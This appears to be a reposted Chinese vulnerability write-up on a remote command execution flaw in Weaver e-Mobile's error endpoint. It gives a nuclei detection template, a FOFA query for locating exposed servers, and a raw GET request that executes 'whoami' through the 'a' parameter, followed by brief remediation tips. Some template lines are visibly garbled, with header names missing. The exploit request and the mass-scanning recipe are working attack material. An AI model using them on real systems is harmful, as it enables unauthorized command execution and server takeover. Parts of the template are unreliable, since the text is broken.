泛微e-Mobile移动管理平台error接口处存在远程命令执行漏洞。攻击者可能利用此漏洞执行恶意命令,导致系统执行未授权的操作,获取服务器权限。
id: weaver-e-Mobile-error-RCE
info:
name: 泛微e-Mobile移动管理平台error接口处存在远程命令执行漏洞
author: kingkong
severity: high
metadata:
body="content="Weaver E-mobile"" || (body="E-Mobile " && body="action="/verifyLogin.do") || body="/images/[email protected]" || (body="window.apiprifix = "/emp";" && title="移动管理平台") :
http:
raw:
|
GET /client/common/error?a=whoami HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 :
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
gzip, deflate :
and :
matchers:
type: dsl
dsl:
'status_code_1 == 200'
'contains(body_1,"</cmd>")'
condition: and
FOFA:body="content="Weaver E-mobile"" || (body="E-Mobile " && body="action="/verifyLogin.do") || body="/images/[email protected]" || (body="window.apiprifix = "/emp";" && title="移动管理平台")
界面如下
漏洞检测POC
GET /client/common/error?a=whoami HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
neclei批量检测截图
1、输入验证:对所有用户输入进行严格的验证,确保只接受预期的格式。
2、使用安全的API:使用安全的库或API来执行命令,避免直接调用系统命令。
3、最小权限原则:确保应用程序仅在必要的权限下运行,限制可执行的命令。
4、输出编码:对输出进行编码,以防止注入攻击。
原文始发于微信公众号(脚本小子):泛微e-Mobile移动管理平台error接口处存在远程命令执行漏洞【漏洞复现|附nuclei-POC】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论